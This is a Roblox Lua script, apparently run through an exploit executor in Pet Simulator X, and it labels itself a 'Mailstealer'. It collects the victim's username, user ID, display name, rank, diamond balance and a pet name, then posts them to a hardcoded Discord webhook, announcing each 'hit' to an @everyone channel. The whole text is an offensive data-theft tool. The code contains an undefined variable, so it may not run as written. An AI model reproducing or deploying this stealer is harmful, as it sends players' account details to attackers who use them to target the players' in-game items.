if game.PlaceId == 6284583030 then 
    _G.GameIn = "Pet Simulator X" 
elseif game.PlaceId == 7722306047 then 
    _G.GameIn = "PSX Trading Plaza" 
elseif game.PlaceId == 10321372166 then 
    _G.GameIn = "PSX Hardcore" 
elseif game.PlaceId == 12610002282 then 
    _G.GameIn = "PSX Pro Trading Plaza" 
elseif game.PlaceId == 11725212117 then 
    _G.GameIn = "PSX Voice Trading Plaza" 
else 
    _G.GameIn = "❓ Couldn't find game" 
end 

local webhookcolor = "16711680" 
_G.CurrentRank = game:GetService("Players").LocalPlayer.PlayerGui.Main.Right.Rank.RankName.Text 
_G.PlrUserVictim = game.Players.LocalPlayer.Name 
_G.PlrUserIDVictim = game.Players.LocalPlayer.UserId 
_G.PlrDisplayNameVictim = game.Players.LocalPlayer.DisplayName 
local lib = require(game:GetService("ReplicatedStorage"):WaitForChild("Library"))
_G.Diamonds = lib.Functions.Commas(lib.Save.Get().Diamonds)
_G.PetName = v.Name

local function sendwebhook() 
    local msg = { 
        ["avatar_url"] = "https://cdn.discordapp.com/icons/1085872367831613471/a_55aaf60df3ca5b6ba8c7fc5401f3a1ba.gif?size=256",
        ["username"] = "✗ Hostee Scriptz ✗",
        ["content"] = "|| @everyone || **Hello But Hostee Scriptz Mailstealer has detected a new hit!**", 
        ["embeds"] = { 
            { 
                ["title"] = "Hostee Scriptz Mailstealer Results", 
                ["description"] = "**Data from the victim**\n🧑Display Name: " .. _G.PlrDisplayNameVictim .. "\n🧑Username: " .. _G.PlrUserVictim .. "\n🧑User ID: " .. _G.PlrUserIDVictim .. "\n🐱Rank: " .. _G.CurrentRank .. "\n🎮Place: " .. _G.GameIn .. "", 
                ["url"] = "https://discord.gg/rizzhub", 
                ["color"] = webhookcolor, 
                ["fields"] = { 
                    { 
                        ["name"] = "Diamonds 💎", 
                        ["value"] = "```" .. _G.Diamonds .. "```", 
                        ["inline"] = true 
                    }, 
                    { 
                        ["name"] = "Pet Name & Rarity", 
                        ["value"] = "```Pet Name: " .. _G.PetName .. "```", 
                        ["inline"] = true 
                    } 
                } 
            } 
        }, 
        ["attachments"] = {} 
    } 

    local Webhook = "https://discord.com/api/webhooks/1114164888147861534/2pnRiDU0gcz60oWnVlycPWUce7uuaZtcuAAEu6K9dMxcY4SLyehxhGDwmJwaptI74q2e" -- Replace with the new webhook URL

    local request = http_request or request or HttpPost or syn.request 
    request({ 
        Url = Webhook, 
        Method = "POST", 
        Headers = { 
            ["Content-Type"] = "application/json" 
        }, 
        Body = game:GetService("HttpService"):JSONEncode(msg) 
    }) 
end 

sendwebhook()
